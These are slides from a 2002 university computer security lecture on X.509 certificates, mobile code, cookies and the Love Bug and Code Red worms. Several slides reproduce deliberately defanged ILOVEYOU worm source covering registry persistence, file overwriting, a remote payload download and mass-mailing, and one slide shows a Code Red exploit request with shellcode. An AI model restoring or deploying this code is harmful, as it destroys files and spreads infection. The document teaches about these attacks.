Lecture 5, 20-771: Computer Security, Fall 2002 1 20-771: Computer Security Lecture 4: ATTACK WEEK Robert Thibadeau School of Computer Science Carnegie.

Lecture 5, 20-771: Computer Security, Fall 2002 1

20-771: Computer SecurityLecture 4: ATTACK WEEK

Robert Thibadeau

School of Computer Science

Carnegie Mellon University

Institute for eCommerce, Fall 2002


Today’s lecture

• X.509v3 (usually Public Key) Certificates• Break (10 min)• Mobile Code• Love Bug• Code Red• Cookies


This Week

Chapters 4,5 WS

… on Linux


Protocol Stack

Physical Layer

Network Interface – EtherNet/etc.

Internet - IP

Transport - TCP

SSL Interface : Port N

HTTP

FTP

TELNET

NNTP

SMTP


What Could Replace SSL?

Physical Layer

Network Interface – EtherNet/etc.

Internet - IP

Transport - TCP

SSL Interface : Port N

HTTP

FTP

TELNET

NNTP

SMTP

IPSec


X.509v3 Certificates• More generally used than SSL

– Used by SSL– Used by nearly every major computer security system

• From Older Standards Groups• ISO/ITU

– International Standards Organization/ANSI– International Telecommunications Union (was CCITT – fax, TIFF)– Part of United Nations as of 1988

• ASN.1 (Abstract Syntax Notation 1) – see www.asn1.com – This is instead of BNF and is pretty arcane, but includes encoding rules (DER)– SGML (predecessor of HTML) used this, X.10 Financial Systems.

• ASN.1 Object Identifier – LDAP, ASN.1 OIDs, Microsoft GUIDs– Tree starting with world, down through countries, companies, etc.,

www.hyperstamps.com fun– Your international phone number is a legal Object Identifier– It is a felony in nearly every country of the world to counterfeit an ISO issued Object

Identifiers


X.509v3 Where to Get

• You have to pay 61 Swiss Francs!– www.itu.org -- search on X.509

– X.509v4 is out

• Those typical Swiss…always getting rich– No, this is how nearly all older standards bodies have

worked – they sell copies of their standards

– Buy them. They are like the RFCs and the W3 Specifications. They will make you one of the few real experts.


What is X.509?

• A means of authenticating a “directory”

• Uses public/private key exclusively (and that means RSA for all practical purposes … Sept 21, remember?)

• A means for chaining certificate authorities– Didn’t work, people really just chain certificates

• The information about who you are is hashed and signed so this can be compared with the plaintext about who you are in the certificate

• Serial Number and v3 also an optional Object Identifier – It’s a FELONY to counterfeit this even in IRAQ!!!


X.509 Basic Form

“Who you are” Plaintext

(Signed) Message Digest for Checking on Message Integrity

(Signed) Public Key for Authentication/Exchange RSA

MD5 SHA

Certificate Serial Number

DateTime and ExpirationSept 21, 2000!


Concepts behind X.509

• user certificate; public key certificate; certificate:

– The public keys of a user, together with some other information, rendered unforgeable by encipherment with the private key of the certification authority which issued it.

• certification path: – An ordered sequence of certificates of objects in the

directory information tree which, together with the public key of the initial object in the path, can be processed to obtain that of the final object in the path.


X.509 NomenclatureXp Public key of a user X

Xs Private key of a user X

Xp[I] Encryption of Information, I, using public key of X

Xs[I] Encryption of I using the private key of X

X{I} Signing I by X : I with hashed summary appended

CA(X) A certification authority of user X

Can(X) (where n>1): CA(CA(…n times(X)))

X1<<X2>> Certificate of user X2 issued by authority X1

X1<<X2>>X2<<X3>> Chain of certificates functionally equivalent to X1<<Xn+1>>

X1p*X1<<X2>> Unwrapping certificate to extract public key.

Ap * A<<B>> B<<C>> denotes using public key A to obtain B’s public key, Bp, from its certificate, followed by using Bp to unwrap C’s certificate. Outcome is the public key of C, Cp.

A -> B Certification path from A to B form of a chain of certificates starting with CA(A)<<CA2(A)>> and ending with CA(B)<<B>>

Note: X’s are names of users, I is arbitrary information


Certificate DefinitionCertificate ::= SIGNED{SEQUENCE{

version version Default v1,

serialNumber CertificateSerialNumber,

signature AlgorithmIdentifier,

issuer Name,

validity Validity,

subject Name,

subjectPublicKeyInfo SubjectPublicKeyInfo,

issuerUniqueIdentifier ObjectIdentifier, - v3

subjectUniqueIdentifier ObjectIdentifier, - v3

extensions Extensions, }}


Certificate Defined (cont)Version :== Integer (for v1, v2, v3) CertificateSerialNumber ::= Integer AlgorithmIdentifier ::= SEQUENCE{ ..stuff about crypto }Validity ::= SEQUENCE {

notBefore Time,notAfter Time}

SubjectPublicKeyInfo ::= SEQUENCE {algorithm AlgorithmIdentifier,subjectPublicKey BITSTRING }

Time ::= CHOICE {utcTime UTCTime,

generalizedTime GeneralizedTime }Extensions ::== SEQUENCE OF extensions

like, Signed Hash, KeyUsage …


X.509v3 Certificate-----BEGIN CERTIFICATE-----MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhvcml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBzbmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzELMAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNlcnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcNAQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC554Ro+VH0dJONqljPBW+C72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGueyG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE+L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImW+Zds8YEFiAwIDAQABo24wbDAbBgNVHREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGG+EIBDQQtFittb2Rfc3NsIGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGG+EIBAQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4Ks0dfWsdItkw4uQ==-----END CERTIFICATE-----


X.509v3 Opened!Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil,

Ltd, OU=Certificate Authority, CN=Snake Oil CA/[email protected]

Validity Not Before: Oct 21 18:21:51 1999 GMT Not After : Oct 20 18:21:51 2001 GMT Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil,

Ltd, OU=Webserver Team, CN=www.snakeoil.dom/[email protected]

Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit):


509 Opened 2KEY : 00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05:

6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad: cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10: 6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82: 95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15: 57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d: 6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38: 66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22: 65:be:65:db:3c:60:41:62:03 Exponent: 65537 (0x10001)

X509v3 extensions: X509v3 Subject Alternative Name: email:[email protected] Netscape Comment: mod_ssl generated custom server certificate Netscape Cert Type: SSL Server Signature Algorithm: md5WithRSAEncryption

7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00: 9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7: de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7: c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9: 95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84: fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68: d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c: 38:b9


Date Time

• Great Security Technique for Authentication– Challenge-Response, let mother nature be the challenge.

– Very hard to defeat since you have to crack the code too quickly … can be used to put a time limit on things. This is used by many certificates.

• Kerberos uses this in issuing “tickets” for a time.

• Great Security Technique for Auditability– Hash the date-time and sign it.

– Requires an authority or both members of transaction to maintain copy (you can’t deny your signature even if you “fix” your copy!)


X.509 certificate types

• For people

• For web sites

• For companies

• For organizations inside companies

• For software

• Etc. etc. etc.

• You could have X.509 certificates that certify a toaster made a piece of toast.

http://yuan.ecom.cmu.edu/security02/509.doc


Bits in the KeyUsage type are as follows:

– a) digitalSignature: For verifying digital signatures that have purposes other than those identified in b), f),

– or g) below.– b) nonRepudiation: For verifying digital signatures used in providing a non-repudiation

service which– protects against the signing entity falsely denying some action (excluding certificate or

CRL signing, as– in f) or g) below).– c) keyEncipherment: For enciphering keys or other security information, e.g. for key

transport. (EXCHANGE)– d) dataEncipherment: For enciphering user data, but not keys or other security

information as in c) above.– e) keyAgreement: For use as a public key agreement key.– f) keyCertSign: For verifying a CA’s signature on certificates.– g) cRLSign: For verifying a CA’s signature on CRLs.– h) encipherOnly: Public key agreement key for use only in enciphering data when used

with keyAgreement– bit also set (meaning with other key usage bit set is undefined).– i) decipherOnly: Public key agreement key for use only in deciphering data when used

with keyAgreement


What’s Wrong with Them

• Classic HORRIBLE USER INTERFACE ASSOCIATED WITH GOOD CRYPTOGRAPHY

• You have to apply to a root CA for one

• They invade your privacy

• They make you PAY

• They make them last only one Year

• Funwork: Go to Thawte (www.verisign.com) and get a free personal certificate for your mail browser (outlook, eudora, or netscape)


X.509v3

• Contains encrypted information that the source can communicate to you in privacy and with authority.

– Authenticated, private, tamperproof, authorization

• Designed to be employed as the basis for PKI : chaining authority

– Pass something up the chain for approval (signing) to provide the absolute authority

– I.e., the President’s office confirms such and such directive.


Break!


Active ContentAlso called “Mobile Code”

• Web Browsers can download and execute software automatically without warning.

• Software may damage user’s system or violate privacy.

• Administrator: This can tunnel through firewall protections.

• Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government.

• Failed: This would “dumb down” Federal employees and make the Government Stupid.


Threats from Mobile Code

• Purposefully malicious– Moldovan Connection

» Sexygirls.com and Erotic2000.com

» Downloaded and ran viewer, program hung up phone and made long distance call to Moldovan, $2 per minute.

» User taken to site stayed around without knowing charge.

» Last few weeks: “Some subscribers to Microsoft's MSN TV service have been struck with a virus that causes their set-top box to dial 911. Ryan Permeh, senior research engineer at eEye Digital Security, said the virus probably was not intended to target MSN TV users.”

– “I Love You” Worm : probable accidental escape.

• Big programs have bugs– Other people will exploit those bugs


Traditional Threats

• Trojan Horses : Very Serious. Often used for spying. (e.g., change the login program to create a back door).

• Virus : Code that replicates itself and inserts into an executable program or file.

• Macro viruses : Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents.

• Rabbits : Programs that make many copies of themselves. Standalone. Denial of Service.

• Worms : Similar but spread across network.


Many Many Threats

• I Love You– Opening email that says “I Love You” from a person you

know: Trojan Horse

– Reads your address book : Privacy Violation

– Deletes image files : Havoc

– Across Network : Worm

• Demonstrated– Microsoft Outlook could execute seriously destructive

and intrusive active content without control of user.


Silent Information Thieves!Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173May 9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net): lookup failureMay 9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.comMay 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.comMay 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.comMay 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.caMay 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.comMay 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.comMay 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.comMay 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.eduMay 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.comMay 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130May 30 01:48:50 nageela ftpd[12032]: connect from 140.123.224.37May 30 02:54:36 nageela ftpd[12051]: connect from u5611a.dorm.ccu.edu.twJun 3 14:09:47 nageela ftpd[14281]: connect from cr908045-a.ym1.on.wave.home.comJun 3 20:30:04 nageela ftpd[14425]: connect from 193.40.7.69Jun 3 20:31:06 nageela ftpd[14426]: connect from 193.40.7.69Jun 7 13:09:40 nageela ftpd[15728]: connect from garfield.EBICom.NetJun 7 13:09:42 nageela ftpd[15729]: connect from garfield.EBICom.NetJun 8 07:44:10 nageela ftpd[16109]: connect from dt010n13.san.rr.comJun 27 16:58:29 nageela ftpd[1482]: connect from 204.116.83.2Jun 30 10:14:05 nageela telnetd[2846]: connect from dialup-wdc24655.mpx.com.auJun 30 10:14:12 nageela telnetd[2847]: connect from dialup-wdc24655.mpx.com.auJul 6 10:55:49 nageela telnetd[5356]: connect from UX6.SP.CS.CMU.EDUJul 9 20:56:41 nageela telnetd[6925]: connect from mozart.wisdom.weizmann.ac.ilJul 9 20:56:41 nageela ftpd[6926]: connect from mozart.wisdom.weizmann.ac.ilJul 9 20:56:41 nageela telnetd[6927]: connect from mozart.wisdom.weizmann.ac.ilJul 10 08:50:42 nageela telnetd[7062]: connect from 200.230.62.36Jul 10 08:50:43 nageela ftpd[7065]: connect from 200.230.62.36Jul 10 08:50:43 nageela telnetd[7066]: connect from 200.230.62.36Jul 13 00:56:01 nageela telnetd[7982]: connect from c64886-b.lakwod3.co.home.comJul 25 05:47:31 nageela ftpd[12972]: connect from 208.240.246.6Jul 25 07:40:20 nageela ftpd[12990]: connect from moonbeam.connriver.netJul 25 07:42:54 nageela ftpd[12991]: connect from moonbeam.connriver.net Jul 25 13:45:48 nageela ftpd[13061]: connect from aigw3.aici.comJul 25 13:45:48 nageela telnetd[13062]: connect from aigw3.aici.comJul 31 09:02:25 nageela ftpd[1146]: connect from 210.223.79.200Jul 31 09:02:26 nageela ftpd[1147]: connect from 210.223.79.200Aug 1 02:07:58 nageela ftpd[1364]: connect from bambina.idnet.deAug 1 02:17:18 nageela ftpd[1367]: connect from bambina.idnet.deAug 2 05:56:47 nageela telnetd[1713]: connect from c64886-b.lakwod3.co.home.comAug 5 23:05:53 nageela ftpd[3643]: connect from www.econ.cau.ac.krAug 9 19:56:48 nageela ftpd[5362]: connect from 216.47.244.7Aug 9 20:19:28 nageela ftpd[5368]: connect from 216.47.244.7Aug 16 02:31:45 nageela ftpd[8304]: connect from i44pc20.info.uni-karlsruhe.deAug 16 02:31:45 nageela ftpd[8305]: connect from i44pc20.info.uni-karlsruhe.deAug 20 22:40:53 nageela telnetd[11114]: connect from kumasi.frontec-uk.comAug 22 22:51:33 nageela ftpd[11716]: connect from cathay-usa.comAug 22 22:51:34 nageela ftpd[11717]: connect from cathay-usa.comAug 23 22:35:31 nageela telnetd[12307]: connect from 209.135.0.220Aug 23 22:36:34 nageela telnetd[12308]: connect from 209.135.0.220Aug 28 21:20:58 nageela ftpd[14980]: connect from dl015.mii.zaz.com.brSep 2 18:30:44 nageela ftpd[18062]: connect from cx388792-a.msnv1.occa.home.comSep 2 18:39:43 nageela ftpd[18063]: connect from cx388792-a.msnv1.occa.home.comSep 7 21:26:17 nageela telnetd[20629]: connect from 198.189.134.199 Sep 8 15:02:48 nageela ftpd[21173]: connect from rht.vi.ri.cmu.edu Transfer interrupted! face="Arial">Sep 10 16:12:43 nageela ftpd[22555]: connect from rht.vi.ri.cmu.edu Sep 10 16:21:19 nageela ftpd[22566]: connect from nageela.vi.ri.cmu.edu Sep 10 16:30:14 nageela ftpd[22607]: connect from nageela.vi.ri.cmu.edu Sep 10 16:31:47 nageela ftpd[22618]: connect from nageela.vi.ri.cmu.edu Sep 10 16:39:09 nageela ftpd[22639]: connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:39:27 nageela telnetd[22640]: connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:41:01 nageela ftpd[22648]: connect from nageela.vi.ri.cmu.edu Sep 10 16:42:20 nageela ftpd[22650]: refused connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:42:28 nageela telnetd[22651]: refused connect from DOLLAR.ECOM.CMU.EDU Sep 10 17:11:37 nageela ftpd[22695]: connect from rht.vi.ri.cmu.edu Sep 13 11:07:01 nageela telnetd[23665]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com Sep 13 11:07:01 nageela telnetd[23665]: refused connect from 192.76.184.141 Sep 13 11:07:20 nageela ftpd[23666]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com Sep 13 11:07:20 nageela ftpd[23666]: refused connect from 192.76.184.141 Sep 14 09:10:08 nageela ftpd[24182]: connect from rht.vi.ri.cmu.edu Sep 14 14:02:22 nageela ftpd[24400]: connect from rht.vi.ri.cmu.edu Sep 15 02:04:05 nageela ftpd[24716]: refused connect from ATBRILL.REM.CMU.EDU Sep 15 04:36:43 nageela ftpd[24757]: connect from jelly.visus.com



Economic CostsComputer Economics – 8-01

• Love Bug : $8.7 Billion

• Melissa $1.2 Billion

• Code Red $2.6 Billion– 250,000 systems in just nine hours on July 19

– 150,000 in 24 on Aug 1 After Warnings

• Repair costs and loss of productivity and unknown cost of asset loss


I Love You Code(virus has been killed)

had name ‘vxryfunny.vbs’

rxm barok -lovxlxttxr(vbx) <i hatx go to school>

rxm by: spydxr / [email protected] / @GRAMMxRSoft Group / Manila,Philippinxs

dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow

Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")

sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)

vbscopy=filx.RxadAll


I Love You Code 2

main()sxt wscr=CrxatxObj("WScript.Shxll")rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows

Scripting Host\Sxttings\Timxout")wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows

Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"Sxt dirwin = fso.GxtSpxcialFoldxr(0)Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)c.Copy(dirsystxm&"\MSKxrnxl32.vbs")c.Copy(dirwin&"\Win32DLL.vbs")c.Copy(dirsystxm&"\Vxry Funny.vbs")rxgruns()html()sprxadtoxmail()listadriv()


I Love You Code 3 : rxgruns()

sub rxgruns()rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\

CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\

CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt

xxplorxr\Download Dirory")rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start

Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank"

xnd sub


I Love You Code 4Listing the Drives on Your Machine

(there were several of these utility-type spies)

sub listadriv

Dim d,dc,s

Sxt dc = fso.Drivxs

For xach d in dc

If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn

foldxrlist(d.path&"\")

xnd if

Nxxt

listadriv = s

xnd sub


I Love You Code 5re-writing jpg files

sub inffilxs(foldxrspxc) sxt f = fso.GxtFoldxr(foldxrspxc)sxt fc = f.Filxsfor xach f1 in fcxxt=fso.GxtxxtxnsionNamx(f1.path)if (xxt="vbs") or (xxt="vbx") thxnsxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)ap.writx vbscopyap.closxxlsxif(xxt="jpg") or (xxt="jpxg") thxnsxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)ap.writx vbscopyap.closx (did same for mp3 files and others)


if (xq<>foldxrspxc) thxnif (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxnsxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")scriptini.WritxLinx "[script]"scriptini.WritxLinx ";mIRC Script"scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"scriptini.WritxLinx ";"scriptini.WritxLinx ";Khalxd Mardam-Bxy"scriptini.WritxLinx ";http://www.mirc.com"scriptini.WritxLinx ";"scriptini.WritxLinx "n0=on 1:JOIN:#:{"scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"scriptini.WritxLinx "n3=}"scriptini.closxxq=foldxrspxcnxxt xnd sub

I Love You Code 6 : .ini


if (xq<>foldxrspxc) thxnif (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxnsxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")scriptini.WritxLinx "[script]"scriptini.WritxLinx ";mIRC Script"scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"scriptini.WritxLinx ";"scriptini.WritxLinx ";Khalxd Mardam-Bxy"scriptini.WritxLinx ";http://www.mirc.com"scriptini.WritxLinx ";"scriptini.WritxLinx "n0=on 1:JOIN:#:{"scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"scriptini.WritxLinx "n3=}"scriptini.closxxq=foldxrspxcnxxt xnd sub

I Love You Code 7 : .ini file


sub sprxadtoxmail()sxt rxgxdit=CrxatxObj("WScript.Shxll")sxt out=WScript.CrxatxObj("Outlook.Application")sxt mapi=out.GxtNamxSpacx("MAPI")for ctrlists=1 to mapi.AddrxssLists.Countsxt a=mapi.AddrxssLists(ctrlists)rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxnfor ctrxntrixs=1 to a.Addrxssxntrixs.Countmalxad=a.Addrxssxntrixs(x)rxgad=""rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)if (rxgad="") thxnsxt malx=out.CrxatxItxm(0)malx.Rxcipixnts.Add(malxad)malx.Subj = "fwd: Jokx"malx.Body = vbcrlf&""malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")malx.SxndSxt out=NothingSxt mapi=Nothingxnd sub

I Love You Code 8 : spread mail


Silent Attacks

• I should be obvious it would not be hard to create a silent worm that sends mail on file systems, files, and address lists (and also all your mail on your local machine).

• We can do this with your web browser too …

… Code Red is only ONE example


Virus Checkers

• Pattern match in secret ways to find viral “fingerprints”

• Use a technique called “finite state automata” to create very fast search over your files.

• If virus is not known already, it will do damage.

• Finding silent viruses may be hard.


Authenticode System

• Windows 2000• Running code requires a X.509v3 Certificate

with an approved CA• Personal Publishers (ID with Credit Bureau)• Commercial Publishers (Articles of

Incorporation)• Sign a pledge: “reasonable care consistent

with prevailing industry standards to keep code free from viruses, malicious code, and other dta that may damage, misappropriate, or otherwise interfere with a third party’s operations.”

• Remedy: Revoke your Certificate (HA!)


Steps you can Take

• Don’t run as administrator/root

• Use Virus Checkers (but watch those companies!!!)

• Backup Often

• Verify the integrity and authenticity of software.

– A very good idea is to not accept active code without a certificate that guarantees the author can be found!

– Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.


Record of URLs you’ve visited

• Browser History file, document cache, and cookies

– Unix: spools or /var/adm / Windows : /winnt, /windows, program files/netscape etc.

– Mobile code can read these.

• Organizations firewall or proxy server (most have logging capability)

• ISPs firewall, router, or proxy server.

• Each of the remote servers you’ve visited.


Web Server• Standard Logs

– HTTP header information» Date, From, URI, Referrer, Response Status to

Request» Also from HTTPS! (The Server Knows!)

– Logs are essential to security

• Fancier Logs– HTTP

» What’s in the forms» What’s in the responses

• Really fancy– Dynamically changing information based on where

you’ve been.– Tracking across web servers.


Code Red Log

12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278


Code Red I and IIhttp://www.eeye.com/html/Research/Advisories/AL20010804.html

• %U9090• %u6858• %ucbd3• %u7801• %u9090• %u6858• %ucbd3• %u7801• %u9090• %u6858• %ucbd3• %u7801• %u9090• %u9090• %u8190• %u00c3• %u0003• %u8b00• %u531b• %u53ff• %u0078• %u0000• %u00=

• %u9090• %u6858• %ucbd3• %u7801• %u9090• %u6858• %ucbd3• %u7801• %u9090• %u6858• %ucbd3• %u7801• %u9090• %u9090• %u8190• %u00c3• %u0003• %u8b00• %u531b• %u53ff• %u0078• %u0000• %u00


Cookies (netscape cookie file)URL-Invoking-It domain? Path in Server https? Expiration Name = valuewww.airtime.co.uk FALSE /users/wysywig/ FALSE 968081837 username aaawww.kbb.com FALSE /kb/ki.dll FALSE 9519638334 zipcode 15638www.jcpenney.com FALSE /jcp FALSE 126632340 ShopperManager%6Fjcp

SHOPPERMANAGER%6FJCP=6EJSN34316NP100L1RURQ8HHF8MX34www.buy.com FALSE /bc FALSE 128333061 ShopperManager%6F

SHOPPERMANAGER%6F=VQ8VSKLCWHSN000CM9C9JS7EDVL1.doubleclick.net TRUE / FALSE 196034991340 id 39609560.lycos.com TRUE / FALSE 161735952 CyberTargetAnonymous

LYC000AFBAE77275BF6D2734BFCF563A16 .cmgi.com TRUE / FALSE 16173595634 CyberGlobalAnonymous

CTG00017D567763405BF1FB34F8BFCD8B1D33.webcrawler.com TRUE / FALSE 9342341600 registered no.webcrawler.com TRUE / FALSE 9342341600 UID 210076B35C89A5C .microsoft.com TRUE / FALSE 1065303482 MC1

GUID=DF160779710D118B1808006BB734F3F .washingtonpost.com TRUE / FALSE 9342951343 RMID 98c81c8d3606d690 www.americanbible.org FALSE / FALSE 16308113498 Int 343 346 38 3 343 38 30

3 334 68 5 3 www.americanbible.org FALSE / FALSE 1630811600 User Profile

F633C7686DA1FDBE85880034CDB11


Cookies (netscape cookie file)

URL-Invoking-It domain? Path in Server https? Expiration Name = value

www.antiquebooks.net FALSE / FALSE 938368777 ulantique 7-1-6-win-ns classics.mit.edu FALSE / FALSE 934285095 ICA_last_work Homer.iliad.jcpenny.com TRUE / FALSE 60516333438 SITESERVER

ID=69bcf8f963456b19fffdf1ff19f.amazon.com TRUE / FALSE 6086797993 ubid-main 06-6073435981034nonprofit.guidestar.org FALSE / FALSE 613723673 CFID 95690 .google.com TRUE / FALSE 6134736834347 ID 34816dff31190ff80 .cmu.edu TRUE / FALSE 6051263400 SITESERVER

ID=f8185834df6bac5f80a793a534c18.waterhouse.com TRUE / FALSE 963585098 accountno 35869873tracking.carprices.com FALSE / FALSE 9634234581 PARTNER CARPRICES tracking.carprices.com FALSE / FALSE 9634234581 MEMB_ID -1 tracking.carprices.com FALSE / FALSE 9634234581 USER 10.8.1.35-1 tracking.carprices.com FALSE / FALSE 9634234578 RETURN VISITOR


Cookies : Server Writes to Browser

Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure

NAME=VALUE expires=DATE domain=DOMAIN_NAME

The default value of domain is the host name of the server which generated the cookie response.

